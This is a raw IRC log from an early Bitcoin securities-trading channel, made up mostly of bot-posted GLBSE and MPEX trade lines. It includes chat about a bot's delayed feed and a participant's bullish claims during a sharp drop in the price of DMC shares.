[PAJKA.BOND] 1 @ 0.08 BTC [-] Aug 14 13:10:46 [GLBSE] [FOO.PPPPT] 2 @ 1.0299 = 2.0598 BTC [-] Aug 14 13:10:47 [GLBSE] [FOO.PPPPT] 8 @ 1.03 = 8.24 BTC [+] Aug 14 13:12:06 1 asicminer for 9 dmc was it? Aug 14 13:16:05 [GLBSE] [TYGRR.BOND-P] 4 @ 1.03021 = 4.1208 BTC [-] Aug 14 13:16:06 [GLBSE] [TYGRR.BOND-P] 25 @ 1.03011 = 25.7528 BTC [-] Aug 14 13:16:08 [GLBSE] [TYGRR.BOND-P] 1 @ 1.022 BTC [-] Aug 14 13:16:09 [GLBSE] [TYGRR.BOND-P] 1 @ 1.02 BTC [-] Aug 14 13:16:10 [GLBSE] [TYGRR.BOND-P] 39 @ 1.02 = 39.78 BTC [-] Aug 14 13:21:21 [MPEX] [S.MPOE] 41900 @ 0.00036473 = 15.2822 BTC [-] Aug 14 13:21:23 [MPEX] [S.MPOE] 2600 @ 0.00037544 = 0.9761 BTC [+] Aug 14 13:23:16 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0589 = 4.2356 BTC [+] Aug 14 13:23:17 [GLBSE] [TYGRR.BOND-P] 26 @ 1.059 = 27.534 BTC [+] Aug 14 13:25:22 [MPEX] [S.MPOE] 11872 @ 0.00037798 = 4.4874 BTC [+] Aug 14 13:31:09 [MPEX] [S.BVPS] 50 @ 0.00357367 = 0.1787 BTC [+] Aug 14 13:31:10 [MPEX] [S.BVPS] 450 @ 0.003849 = 1.7321 BTC [+] Aug 14 13:32:20 mircea_popescu ? Aug 14 13:32:23 btw, copumpkin, re the bond laying fallow risk : you can split it up, you know ? Aug 14 13:32:28 kakobreklaa hm ? Aug 14 13:32:31 05:09.09 ( mircea_popescu ) hmm, is assbot off kakobrekla ? Aug 14 13:32:38 i dunno what happened there, but Aug 14 13:32:49 i was getting > 1 hr stale reports. it might have been my irc connection tho Aug 14 13:32:56 uh Aug 14 13:33:20 strange Aug 14 13:33:28 very, i mean i see things on twitter, they don't pop Aug 14 13:33:31 [GLBSE] [ASICMINER] 100 @ 0.1 = 10 BTC [+] Aug 14 13:33:35 then i go i wonder if it died, then something comes up Aug 14 13:33:40 but that was on twitter like 1 hr before. Aug 14 13:33:55 i have no reasonable explanation for this Aug 14 13:34:17 want to see my log ? Aug 14 13:34:21 [GLBSE] [OBSI.HRPT] 10 @ 0.1021 = 1.021 BTC [-] Aug 14 13:34:23 [GLBSE] [OBSI.HRPT] 8 @ 0.1020102 = 0.8161 BTC [-] Aug 14 13:34:24 [GLBSE] [OBSI.HRPT] 18 @ 0.102 = 1.836 BTC [-] Aug 14 13:34:25 [GLBSE] [OBSI.HRPT] 48 @ 0.10124 = 4.8595 BTC [-] Aug 14 13:34:27 [GLBSE] [OBSI.HRPT] 5 @ 0.10123013 = 0.5062 BTC [-] Aug 14 13:34:28 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 14 13:34:34 i mean it's prolly no big deal anyway. Aug 14 13:34:49 not sure how that will help, but keep an eye on it Aug 14 13:34:55 if you see it happenin again Aug 14 13:34:57 i will investigate Aug 14 13:35:07 sounds about right. Aug 14 13:36:54 [MPEX] [S.MPOE] 8409 @ 0.00038567 = 3.2431 BTC [+] Aug 14 13:36:56 [MPEX] [S.MPOE] 41700 @ 0.00038015 = 15.8523 BTC [-] Aug 14 13:36:57 [MPEX] [S.MPOE] 17100 @ 0.00037544 = 6.42 BTC [-] Aug 14 13:36:58 [MPEX] [S.MPOE] 30000 @ 0.00036382 = 10.9146 BTC [-] Aug 14 13:36:59 [MPEX] [S.MPOE] 11300 @ 0.00036288 = 4.1005 BTC [-] Aug 14 13:37:01 [MPEX] [S.MPOE] 25700 @ 0.00035838 = 9.2104 BTC [-] Aug 14 13:37:02 [MPEX] [S.MPOE] 43627 @ 0.00035385 = 15.4374 BTC [-] Aug 14 13:37:03 [MPEX] [S.MPOE] 61045 @ 0.00035328 = 21.566 BTC [-] Aug 14 13:37:03 [MPEX] [S.MPOE] 20900 @ 0.00035047 = 7.3248 BTC [-] Aug 14 13:37:04 [MPEX] [S.MPOE] 44263 @ 0.00035 = 15.4921 BTC [-] Aug 14 13:39:21 [MPEX] [S.MPOE] 195956 @ 0.00035 = 68.5846 BTC [-] Aug 14 13:39:22 [MPEX] [S.MPOE] 4044 @ 0.00038671 = 1.5639 BTC [+] Aug 14 13:42:34 [MPEX] [S.MPOE] 1447 @ 0.00038671 = 0.5596 BTC [+] Aug 14 13:42:35 [MPEX] [S.MPOE] 27100 @ 0.00038718 = 10.4926 BTC [+] Aug 14 13:42:37 [MPEX] [S.MPOE] 1200 @ 0.00038749 = 0.465 BTC [+] Aug 14 13:42:38 [MPEX] [S.MPOE] 31753 @ 0.0003879 = 12.317 BTC [+] Aug 14 13:55:53 [GLBSE] [DMC] 1 @ 0.035 BTC [+] Aug 14 13:58:29 [GLBSE] [GIGAMINING] 1 @ 1.1389 BTC [-] Aug 14 13:58:55 [GLBSE] [GIGAMINING] 1 @ 1.1389 BTC [-] Aug 14 14:01:17 [MPEX] [F.GIGA.ETF] 8800 @ 0.00110183 = 9.6961 BTC [+] Aug 14 14:01:19 [MPEX] [F.GIGA.ETF] 6500 @ 0.00110586 = 7.1881 BTC [+] Aug 14 14:03:28 [GLBSE] [BMMO] 2 @ 0.06999999 = 0.14 BTC [-] Aug 14 14:10:01 [GLBSE] [MOORE] 3 @ 0.5145 = 1.5435 BTC [+] Aug 14 14:11:32 [GLBSE] [JTME] 3 @ 0.99 = 2.97 BTC [-] Aug 14 14:15:11 [GLBSE] [NYAN.B] 1 @ 0.98 BTC [-] Aug 14 14:17:40 [GLBSE] [MOORE] 1 @ 0.5001 BTC [-] Aug 14 14:20:02 [GLBSE] [OBSI.HRPT] 4 @ 0.1043 = 0.4172 BTC [+] Aug 14 14:20:27 [GLBSE] [OBSI.ABMO] 1 @ 0.1 BTC Aug 14 14:21:10 [GLBSE] [TYGRR.BOND-P] 2 @ 1.059 = 2.118 BTC [+] Aug 14 14:21:46 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Aug 14 14:22:49 [GLBSE] [FOO.PPPPT] 1 @ 1.03 BTC [+] Aug 14 14:23:55 [GLBSE] [DMC] 10 @ 0.035 = 0.35 BTC [+] Aug 14 14:24:28 [GLBSE] [GIGAMINING] 1 @ 1.08 BTC [-] Aug 14 14:24:30 [GLBSE] [GIGAMINING] 3 @ 1.08 = 3.24 BTC [-] Aug 14 14:24:31 [GLBSE] [GIGAMINING] 4 @ 1.08 = 4.32 BTC [-] Aug 14 14:26:37 [GLBSE] [FOO.PPPPT] 4 @ 1.03 = 4.12 BTC [+] Aug 14 14:27:21 [GLBSE] [YABMC] 10 @ 0.115 = 1.15 BTC [-] Aug 14 14:27:28 [GLBSE] [GIGAMINING] 13 @ 1.079 = 14.027 BTC [-] Aug 14 14:29:13 [GLBSE] [ASICMINER] 20 @ 0.1 = 2 BTC [+] Aug 14 14:30:09 [GLBSE] [DMC] 30 @ 0.035 = 1.05 BTC [+] Aug 14 14:33:13 [GLBSE] [DMC] 50 @ 0.035 = 1.75 BTC [+] Aug 14 14:35:08 [GLBSE] [DMC] 10 @ 0.035 = 0.35 BTC [+] Aug 14 14:35:26 [GLBSE] [DMC] 1 @ 0.035 BTC [+] Aug 14 14:35:33 [GLBSE] [DMC] 1 @ 0.035 BTC [+] Aug 14 14:39:54 [MPEX] [F.GIGA.ETF] 3900 @ 0.00108301 = 4.2237 BTC [-] Aug 14 14:39:55 [MPEX] [F.GIGA.ETF] 2300 @ 0.00108267 = 2.4901 BTC [-] Aug 14 14:39:57 [MPEX] [F.GIGA.ETF] 800 @ 0.00108081 = 0.8646 BTC [-] Aug 14 14:39:58 [MPEX] [F.GIGA.ETF] 11700 @ 0.00107912 = 12.6257 BTC [-] Aug 14 14:46:55 [GLBSE] [GIGAMINING] 4 @ 1.0801 = 4.3204 BTC [+] Aug 14 14:46:57 [GLBSE] [GIGAMINING] 20 @ 1.08 = 21.6 BTC [-] Aug 14 14:46:57 [GLBSE] [GIGAMINING] 10 @ 1.079 = 10.79 BTC [-] Aug 14 14:46:58 [GLBSE] [GIGAMINING] 1 @ 1.078 BTC [-] Aug 14 14:47:00 [GLBSE] [GIGAMINING] 38 @ 1.06250001 = 40.375 BTC [-] Aug 14 14:47:06 [MPEX] [S.MPOE] 17700 @ 0.00036557 = 6.4706 BTC [-] Aug 14 14:58:14 [GLBSE] [NASTY] 1 @ 0.5448 BTC [-] Aug 14 14:58:15 [GLBSE] [NASTY] 5 @ 0.52248 = 2.6124 BTC [-] Aug 14 14:58:16 [GLBSE] [NASTY] 5 @ 0.52 = 2.6 BTC [-] Aug 14 14:59:10 [GLBSE] [ASICMINER] 57 @ 0.1 = 5.7 BTC [+] Aug 14 14:59:18 [MPEX] [S.MPOE] 31627 @ 0.00036854 = 11.6558 BTC [+] Aug 14 14:59:42 Looking to trade some shares, have a look at my portfolio and see if there's anything you are interested in https://docs.google.com/spreadsheet/ccc?key=0Aq6Ug2ODt-l2dC13WldWaTBWQVNYZWRwVDgtQmhzUkE#gid=0 Or if you want to sell then pm me and I will see if I am interested in that asset :) Aug 14 15:00:04 [GLBSE] [TYGRR.BOND-B] 1 @ 0.10000001 BTC [-] Aug 14 15:00:05 [GLBSE] [TYGRR.BOND-B] 9 @ 0.1 = 0.9 BTC [-] Aug 14 15:02:00 [GLBSE] [YABMC] 11 @ 0.12299999 = 1.353 BTC [+] Aug 14 15:02:39 [GLBSE] [GOLD] 8 @ 0.01 = 0.08 BTC [+] Aug 14 15:02:48 [MPEX] [S.MPOE] 4690 @ 0.00036854 = 1.7285 BTC [+] Aug 14 15:02:50 [MPEX] [S.MPOE] 16000 @ 0.00034477 = 5.5163 BTC [-] Aug 14 15:02:51 [MPEX] [S.MPOE] 510 @ 0.00034477 = 0.1758 BTC [-] Aug 14 15:02:53 [GLBSE] [PUREMINING] 3 @ 0.154398 = 0.4632 BTC [-] Aug 14 15:03:20 [GLBSE] [FUTUREFUND] 450 @ 0.00011716 = 0.0527 BTC [+] Aug 14 15:05:58 [GLBSE] [FOO.PPPPT] 5 @ 1.033 = 5.165 BTC [+] Aug 14 15:06:51 [GLBSE] [IBB] 1 @ 0.64 BTC Aug 14 15:06:53 [GLBSE] [BITCOINMINV] 2 @ 0.12 = 0.24 BTC [-] Aug 14 15:12:26 [GLBSE] [FOO.PPPPT] 3 @ 1.035 = 3.105 BTC [+] Aug 14 15:12:28 oohhh some of my stock sold lol Aug 14 15:14:15 [GLBSE] [MERGEDMINING] 2 @ 0.07999999 = 0.16 BTC [-] Aug 14 15:14:17 [GLBSE] [MERGEDMINING] 3 @ 0.08 = 0.24 BTC [+] Aug 14 15:14:51 [GLBSE] [MERGEDMINING] 7 @ 0.08 = 0.56 BTC [+] Aug 14 15:18:02 [GLBSE] [ASICMINER] 13 @ 0.1 = 1.3 BTC [+] Aug 14 15:26:42 [GLBSE] [GIPPT] 1 @ 1.243 BTC [+] Aug 14 15:27:48 [GLBSE] [TYGRR.BOND-PI] 2 @ 1.6 = 3.2 BTC [-] Aug 14 15:28:59 [GLBSE] [BTC-MINING] 1 @ 0.9888 BTC [-] Aug 14 15:29:21 [GLBSE] [YARR] 2 @ 1.52 = 3.04 BTC [+] Aug 14 15:30:38 [GLBSE] [YARR] 1 @ 1.529 BTC [+] Aug 14 15:34:35 [GLBSE] [FOO.PPPPT] 2 @ 1.035 = 2.07 BTC [+] Aug 14 15:36:02 [GLBSE] [FOO.PPPPT] 2 @ 1.04 = 2.08 BTC [+] Aug 14 15:36:21 [GLBSE] [ASICMINER] 13 @ 0.1 = 1.3 BTC [+] Aug 14 15:39:13 [GLBSE] [YABMC] 1 @ 0.12299999 BTC [+] Aug 14 15:42:25 [GLBSE] [FOO.PPPPT] 1 @ 1.04 BTC [+] Aug 14 15:43:03 [GLBSE] [FPGAMINING] 2 @ 0.95 = 1.9 BTC [+] Aug 14 15:43:56 [GLBSE] [ASICMINER] 18 @ 0.1 = 1.8 BTC [+] Aug 14 15:46:33 [MPEX] [O.BTCUSD.P090T] 10 @ 0.05020301 = 0.502 BTC [+] Aug 14 15:49:51 [GLBSE] [ASICMINER] 30 @ 0.1 = 3 BTC [+] Aug 14 15:51:46 [GLBSE] [FUTUREFUND] 30 @ 0.000111 = 0.0033 BTC [-] Aug 14 15:54:15 [MPEX] [S.MPOE] 37538 @ 0.00038007 = 14.2671 BTC [+] Aug 14 15:54:16 [MPEX] [S.MPOE] 11962 @ 0.00038394 = 4.5927 BTC [+] Aug 14 15:55:29 [GLBSE] [GIGAMINING] 9 @ 1.06250001 = 9.5625 BTC [-] Aug 14 15:55:29 [GLBSE] [GIGAMINING] 3 @ 1.0625 = 3.1875 BTC [-] Aug 14 15:57:14 [GLBSE] [BMMO] 1 @ 0.06999999 BTC [-] Aug 14 15:57:31 [GLBSE] [OBSI.HRPT] 5 @ 0.1041 = 0.5205 BTC [-] Aug 14 15:59:06 [GLBSE] [OBSI.1MHS] 1 @ 0.09999999 BTC [+] Aug 14 16:05:36 [GLBSE] [FOO.PPPPT] 2 @ 1.02031 = 2.0406 BTC [-] Aug 14 16:05:38 [GLBSE] [FOO.PPPPT] 3 @ 1.02021 = 3.0606 BTC [-] Aug 14 16:10:48 [GLBSE] [FOO.PPPPT] 2 @ 1.04 = 2.08 BTC [+] Aug 14 16:10:50 [GLBSE] [FOO.PPPPT] 2 @ 1.045 = 2.09 BTC [+] Aug 14 16:10:51 [GLBSE] [FOO.PPPPT] 2 @ 1.0465 = 2.093 BTC [+] Aug 14 16:10:52 [GLBSE] [FOO.PPPPT] 15 @ 1.048 = 15.72 BTC [+] Aug 14 16:10:53 [GLBSE] [FOO.PPPPT] 3 @ 1.0499 = 3.1497 BTC [+] Aug 14 16:10:54 [GLBSE] [FOO.PPPPT] 76 @ 1.05 = 79.8 BTC [+] Aug 14 16:11:38 [GLBSE] [FPGAMINING] 8 @ 0.95 = 7.6 BTC [+] Aug 14 16:14:12 [GLBSE] [BIB.PIRATE] 3 @ 1.0099 = 3.0297 BTC [-] Aug 14 16:14:13 [GLBSE] [BIB.PIRATE] 49 @ 1.0125 = 49.6125 BTC [+] Aug 14 16:14:14 [GLBSE] [BIB.PIRATE] 14 @ 1.017 = 14.238 BTC [+] Aug 14 16:14:15 [GLBSE] [BIB.PIRATE] 60 @ 1.019 = 61.14 BTC [+] Aug 14 16:14:17 [GLBSE] [BIB.PIRATE] 24 @ 1.02 = 24.48 BTC [+] Aug 14 16:17:05 [GLBSE] [FPGAMINING] 19 @ 0.9 = 17.1 BTC [-] Aug 14 16:17:07 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [-] Aug 14 16:17:13 [GLBSE] [GIGAMINING] 11 @ 1.1279 = 12.4069 BTC [+] Aug 14 16:21:12 [MPEX] [S.BVPS] 350 @ 0.003849 = 1.3472 BTC [+] Aug 14 16:23:34 [GLBSE] [BITBOND] 1 @ 0.4499 BTC [+] Aug 14 16:23:36 [GLBSE] [BITBOND] 4 @ 0.45 = 1.8 BTC [+] Aug 14 16:23:37 [GLBSE] [BITBOND] 44 @ 0.469 = 20.636 BTC [+] Aug 14 16:23:53 [GLBSE] [YARR] 5 @ 1.53 = 7.65 BTC [+] Aug 14 16:24:01 [GLBSE] [PPT.A] 1 @ 1.1667 BTC [-] Aug 14 16:24:01 [GLBSE] [PPT.A] 1 @ 1.1668 BTC [+] Aug 14 16:24:34 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.92 = 1.84 BTC [-] Aug 14 16:27:35 [GLBSE] [FPGAMINING] 1 @ 0.959 BTC [+] Aug 14 16:27:55 [GLBSE] [DMC] 40 @ 0.035 = 1.4 BTC [+] Aug 14 16:29:46 [GLBSE] [ASICMINER] 50 @ 0.1 = 5 BTC [+] Aug 14 16:30:40 [GLBSE] [DMC] 10 @ 0.035 = 0.35 BTC [+] Aug 14 16:33:04 [GLBSE] [BITCOINRS] 10 @ 0.047 = 0.47 BTC [-] Aug 14 16:35:29 [GLBSE] [RAREEARTH] 2 @ 0.00997 = 0.0199 BTC [+] Aug 14 16:36:15 [GLBSE] [RAREEARTH] 2 @ 0.00998 = 0.02 BTC [+] Aug 14 16:36:31 [GLBSE] [PPT.A] 73 @ 1.1668 = 85.1764 BTC [+] Aug 14 16:36:32 [GLBSE] [RAREEARTH] 22 @ 0.01 = 0.22 BTC [+] Aug 14 16:38:05 [GLBSE] [BTCMC] 4 @ 0.7101 = 2.8404 BTC [-] Aug 14 16:39:40 [GLBSE] [DMC] 2 @ 0.035 = 0.07 BTC [+] Aug 14 16:39:53 [GLBSE] [ASICMINER] 3 @ 0.1 = 0.3 BTC [+] Aug 14 16:39:57 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [+] Aug 14 16:41:03 [GLBSE] [DMC] 80 @ 0.035 = 2.8 BTC [+] Aug 14 16:42:51 [GLBSE] [DMC] 10 @ 0.035 = 0.35 BTC [+] Aug 14 16:44:17 [GLBSE] [DMC] 623 @ 0.035 = 21.805 BTC [+] Aug 14 16:46:06 [GLBSE] [BIB.PIRATE] 6 @ 1.019999 = 6.12 BTC [-] Aug 14 16:46:18 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 16:47:49 [GLBSE] [ASICMINER] 2 @ 0.1 = 0.2 BTC [+] Aug 14 16:50:08 [GLBSE] [BIB.PIRATE] 2 @ 1.019999 = 2.04 BTC [-] Aug 14 17:01:23 [MPEX] [S.MPOE] 15638 @ 0.00038394 = 6.0041 BTC [+] Aug 14 17:01:24 [MPEX] [S.MPOE] 1138 @ 0.0003879 = 0.4414 BTC [+] Aug 14 17:01:26 [MPEX] [S.MPOE] 924 @ 0.00038825 = 0.3587 BTC [+] Aug 14 17:12:18 [GLBSE] [BDT] 3 @ 1.0701 = 3.2103 BTC [-] Aug 14 17:12:19 [GLBSE] [BDT] 3 @ 1.07 = 3.21 BTC [-] Aug 14 17:13:10 [MPEX] [S.MPOE] 3876 @ 0.00038825 = 1.5049 BTC [+] Aug 14 17:13:12 [MPEX] [S.MPOE] 1240 @ 0.00038888 = 0.4822 BTC [+] Aug 14 17:13:13 [MPEX] [S.MPOE] 32984 @ 0.00039254 = 12.9475 BTC [+] Aug 14 17:16:09 [GLBSE] [GIPPT] 5 @ 1.2 = 6 BTC [-] Aug 14 17:16:24 [GLBSE] [BITBOND] 6 @ 0.4601 = 2.7606 BTC [-] Aug 14 17:18:55 [GLBSE] [GIGAMINING] 6 @ 1.1279 = 6.7674 BTC [+] Aug 14 17:19:41 [GLBSE] [BITBOND] 2 @ 0.468 = 0.936 BTC [+] Aug 14 17:20:28 [GLBSE] [BITBOND] 2 @ 0.469 = 0.938 BTC [+] Aug 14 17:21:07 [GLBSE] [GIGAMINING] 1 @ 1.128 BTC [+] Aug 14 17:22:08 [GLBSE] [YARR] 5 @ 1.53 = 7.65 BTC [+] Aug 14 17:24:55 [GLBSE] [BITBOND] 2 @ 0.468 = 0.936 BTC [-] Aug 14 17:26:11 [GLBSE] [GREEN] 1 @ 0.75 BTC [+] Aug 14 17:26:33 [GLBSE] [BITBOND] 6 @ 0.4679 = 2.8074 BTC [-] Aug 14 17:27:04 [GLBSE] [TYGRR.BOND-PI] 5 @ 1.6 = 8 BTC [-] Aug 14 17:27:37 [GLBSE] [ASICMINER] 100 @ 0.1 = 10 BTC [+] Aug 14 17:27:44 [GLBSE] [BITBOND] 2 @ 0.469 = 0.938 BTC [+] Aug 14 17:28:10 [GLBSE] [GIPPT] 4 @ 1.24 = 4.96 BTC [+] Aug 14 17:29:13 [GLBSE] [PUREMINING] 3 @ 0.154398 = 0.4632 BTC [-] Aug 14 17:30:41 [GLBSE] [ASICMINER] 40 @ 0.1 = 4 BTC [+] Aug 14 17:31:13 [GLBSE] [ASICMINER] 8 @ 0.1 = 0.8 BTC [+] Aug 14 17:31:56 [GLBSE] [GIPPT] 1 @ 1.24 BTC [+] Aug 14 17:32:21 !ticker ASICMINER Aug 14 17:32:32 [GLBSE:ASICMINER] [Bid: 0.093] [Ask: 0.1] [Spread: 0.007] [Last: 0.1] [24hVol: 958] [7dAvg: 0.09999468] Aug 14 17:32:35 [GLBSE] [PUREMINING] 6 @ 0.154398 = 0.9264 BTC [-] Aug 14 17:39:27 YARR has been paid. Good game Aug 14 17:40:18 [GLBSE] [BTCMC] 4 @ 0.7101 = 2.8404 BTC [-] Aug 14 17:40:30 [GLBSE] [FOO.PPPPT] 2 @ 1.0499 = 2.0998 BTC [-] Aug 14 17:40:36 [GLBSE] [DMC] 1 @ 0.04 BTC [+] Aug 14 17:49:12 [GLBSE] [NYAN.C] 8 @ 1.079 = 8.632 BTC [+] Aug 14 17:52:22 [GLBSE] [ASICMINER] 200 @ 0.1 = 20 BTC [+] Aug 14 18:02:11 [GLBSE] [FOO.PPPPT] 7 @ 1.05 = 7.35 BTC [+] Aug 14 18:04:55 [GLBSE] [BITCOINMINV] 5 @ 0.12 = 0.6 BTC [-] Aug 14 18:06:06 [GLBSE] [YARR] 10 @ 1.51 = 15.1 BTC [-] Aug 14 18:06:07 [GLBSE] [YARR] 10 @ 1.5 = 15 BTC [-] Aug 14 18:06:08 [GLBSE] [YARR] 70 @ 1.5 = 105 BTC [-] Aug 14 18:06:09 [GLBSE] [YARR] 3 @ 1.49 = 4.47 BTC [-] Aug 14 18:06:11 [GLBSE] [YARR] 27 @ 1.46 = 39.42 BTC [-] Aug 14 18:07:14 what happend to DMC chare price? Aug 14 18:08:28 share* Aug 14 18:09:10 Not just DMC it seems Aug 14 18:09:29 [GLBSE] [HYDRO.BONDS] 3 @ 1.5001 = 4.5003 BTC [+] Aug 14 18:09:30 [GLBSE] [HYDRO.BONDS] 31 @ 1.5 = 46.5 BTC [-] Aug 14 18:10:06 but from around 0.5- 0.6 to 0.04 ? Aug 14 18:10:10 [GLBSE] [BITBOND] 1 @ 0.4689 BTC [-] Aug 14 18:10:16 [GLBSE] [PPT.E] 100 @ 1.2 = 120 BTC [+] Aug 14 18:10:41 JAH went from 0.169 to 0.001 Aug 14 18:10:59 I had a bid at 0.001 :) Aug 14 18:11:41 [GLBSE] [OBSI.HRPT] 5 @ 0.103 = 0.515 BTC [-] Aug 14 18:11:43 [GLBSE] [OBSI.HRPT] 22 @ 0.104 = 2.288 BTC [+] Aug 14 18:11:44 [GLBSE] [OBSI.HRPT] 32 @ 0.1041 = 3.3312 BTC [+] Aug 14 18:11:45 [GLBSE] [OBSI.HRPT] 6 @ 0.1043 = 0.6258 BTC [+] Aug 14 18:11:47 [GLBSE] [OBSI.HRPT] 18 @ 0.1043 = 1.8774 BTC [+] Aug 14 18:11:48 [GLBSE] [OBSI.HRPT] 186 @ 0.1045 = 19.437 BTC [+] Aug 14 18:11:49 [GLBSE] [OBSI.HRPT] 59 @ 0.1049 = 6.1891 BTC [+] Aug 14 18:11:50 [GLBSE] [OBSI.HRPT] 114 @ 0.105 = 11.97 BTC [+] Aug 14 18:12:55 [GLBSE] [BITBOND] 1 @ 0.469 BTC [+] Aug 14 18:15:05 [GLBSE] [BDT] 3 @ 1.07979999 = 3.2394 BTC [+] Aug 14 18:15:07 [GLBSE] [BDT] 2 @ 1.07989999 = 2.1598 BTC [+] Aug 14 18:15:55 !pl dmc 0.63 Aug 14 18:15:55 Requesting data from GLBSE (might take a while). Aug 14 18:16:09 DMC [1@0.63BTC] paid: 0.02635814 BTC. Last price: 0.04 BTC. Capital gain: -0.59 BTC. Total: -0.56364186 BTC. (-89.5%) Aug 14 18:16:17 [GLBSE] [OBSI.1MHS] 3 @ 0.07050001 = 0.2115 BTC [-] Aug 14 18:16:19 [GLBSE] [OBSI.1MHS] 5 @ 0.0705 = 0.3525 BTC [-] Aug 14 18:16:20 [GLBSE] [OBSI.1MHS] 10 @ 0.05 = 0.5 BTC [-] Aug 14 18:16:54 [GLBSE] [JAH] 10 @ 0.1 = 1 BTC [+] Aug 14 18:17:32 [GLBSE] [ASICMINER] 4 @ 0.1 = 0.4 BTC [+] Aug 14 18:18:16 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [+] Aug 14 18:18:25 [GLBSE] [YABMC] 15 @ 0.1151 = 1.7265 BTC [-] Aug 14 18:18:27 [GLBSE] [YABMC] 35 @ 0.115 = 4.025 BTC [-] Aug 14 18:19:21 [MPEX] [S.MPOE] 4800 @ 0.00038367 = 1.8416 BTC [-] Aug 14 18:19:23 [MPEX] [S.MPOE] 15700 @ 0.00038225 = 6.0013 BTC [-] Aug 14 18:19:24 [MPEX] [S.MPOE] 10800 @ 0.0003785 = 4.0878 BTC [-] Aug 14 18:24:18 [GLBSE] [DMC] 100 @ 0.03 = 3 BTC [-] Aug 14 18:24:53 [GLBSE] [BITBOND] 2 @ 0.469 = 0.938 BTC [+] Aug 14 18:25:32 [GLBSE] [DMC] 200 @ 0.04 = 8 BTC [+] Aug 14 18:25:45 [GLBSE] [YABIF] 2 @ 1 = 2 BTC [-] Aug 14 18:30:04 [GLBSE] [YABMC] 2 @ 0.1219 = 0.2438 BTC [+] Aug 14 18:32:16 [GLBSE] [FPGA-EU] 5 @ 0.15 = 0.75 BTC [-] Aug 14 18:32:21 [GLBSE] [TYGRR.BOND-B] 1 @ 0.1002 BTC [+] Aug 14 18:32:52 [GLBSE] [DMC] 18 @ 0.04 = 0.72 BTC [+] Aug 14 18:32:53 [MPEX] [S.MPOE] 32600 @ 0.0003785 = 12.3391 BTC [-] Aug 14 18:32:54 [MPEX] [S.MPOE] 8500 @ 0.00037668 = 3.2018 BTC [-] Aug 14 18:33:59 [GLBSE] [ASICMINER] 30 @ 0.1 = 3 BTC [+] Aug 14 18:34:11 [GLBSE] [M.ETF] 10 @ 0.109 = 1.09 BTC [-] Aug 14 18:35:09 [GLBSE] [DMC] 20 @ 0.04 = 0.8 BTC [+] Aug 14 18:36:39 [GLBSE] [DMC] 5 @ 0.04 = 0.2 BTC [+] Aug 14 18:36:52 [GLBSE] [DMC] 3 @ 0.04 = 0.12 BTC [+] Aug 14 18:37:48 [GLBSE] [YABMC] 4 @ 0.1151 = 0.4604 BTC [-] Aug 14 18:38:21 [GLBSE] [DMC] 6 @ 0.039 = 0.234 BTC [-] Aug 14 18:39:04 [GLBSE] [DMC] 5 @ 0.039 = 0.195 BTC [-] Aug 14 18:39:11 [GLBSE] [FOO.PPPPT] 3 @ 1.05 = 3.15 BTC [+] Aug 14 18:46:22 man, DMC is popular today Aug 14 18:46:26 total shares sold: 9899 Aug 14 18:46:33 total mhash: 35018 Aug 14 18:46:36 mhash per share: 3.537 Aug 14 18:46:54 but the price? Aug 14 18:47:01 0.03 ? Aug 14 18:47:07 well no Aug 14 18:47:17 no one knows what the price is going to be Aug 14 18:47:37 but why is it so low now? not logical Aug 14 18:47:47 well Aug 14 18:47:51 if you're buying DMC for the mhash Aug 14 18:47:53 you're an idiot Aug 14 18:48:06 you can buy straight out mhash cheaper from someone else Aug 14 18:48:27 not at 0.03 Aug 14 18:48:32 what you're buying is part of the DMC plan. Aug 14 18:49:06 [MPEX] [F.GIGA.ETF] 2600 @ 0.00110586 = 2.8752 BTC [+] Aug 14 18:49:15 mining is self destructing and soon DMC will own most of the mining power out there in Bitcoin land. Aug 14 18:49:53 this will end up locking down the glbse market and stabilize it Aug 14 18:50:02 so I can finally get back to doing what I wanted to do to begin with Aug 14 18:52:03 kakobrekla: btw, as a side note Aug 14 18:52:12 the market cannot function unless there are people who are not fully efficient Aug 14 18:52:38 everytime someone sells a share of DMC for less than 1 BTC, it makes the market function. Aug 14 18:53:00 It also increases the value of the investment everyone else has made into DMC Aug 14 18:53:18 So let them make that mistake Aug 14 18:53:28 Its their choice, and I have warned them against doing it, it is not in their interest Aug 14 18:55:57 betting against DMC is not particularly profitable. Aug 14 18:56:43 !pl dmc 0.63 Aug 14 18:56:44 Requesting data from GLBSE (might take a while). Aug 14 18:56:49 DMC [1@0.63BTC] paid: 0.02635814 BTC. Last price: 0.039 BTC. Capital gain: -0.591 BTC. Total: -0.56464186 BTC. (-89.6%) Aug 14 18:56:58 telling people not to sell so they wont feel the need to sell wont work Aug 14 18:57:14 kakobrekla: oh no, dont get me wrong Aug 14 18:57:25 Im telling them not to sell because they'll lose out on all future profits Aug 14 18:57:29 short term they might win Aug 14 18:57:34 short term they could make 10x more Aug 14 18:57:41 long term? bwhahaha nope.jpg. Aug 14 18:58:20 [MPEX] [S.MPOE] 22900 @ 0.0003803 = 8.7089 BTC [+] Aug 14 18:59:00 kakobrekla: so, whatever. Aug 14 18:59:22 kakobrekla: also, do realize, the majority investor is now usagi Aug 14 18:59:35 so if you hate the direction DMC is going, feel free to bitch at him too Aug 14 19:00:03 whats your swap rate with other bonds now Aug 14 19:00:07 it'd take both of us combined to turn DMC away from the giant pile of gold its headed towards Aug 14 19:00:20 the whole snatching defeat out of the jaws of victory kind of thing Aug 14 19:00:59 we're going to crash into a planet made of solid gold and you cant stop us Aug 14 19:01:13 haters gonna hate. Aug 14 19:03:57 [MPEX] [F.GIGA.ETF] 250 @ 0.00110586 = 0.2765 BTC [+] Aug 14 19:03:58 [MPEX] [F.GIGA.ETF] 850 @ 0.00110882 = 0.9425 BTC [+] Aug 14 19:05:05 [GLBSE] [OBSI.HRPT] 1 @ 0.101 BTC [-] Aug 14 19:05:06 [GLBSE] [OBSI.HRPT] 23 @ 0.1001 = 2.3023 BTC [-] Aug 14 19:05:08 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 14 19:05:15 [MPEX] [S.BVPS] 450 @ 0.00384 = 1.728 BTC [-] Aug 14 19:05:17 [MPEX] [S.BVPS] 500 @ 0.00384 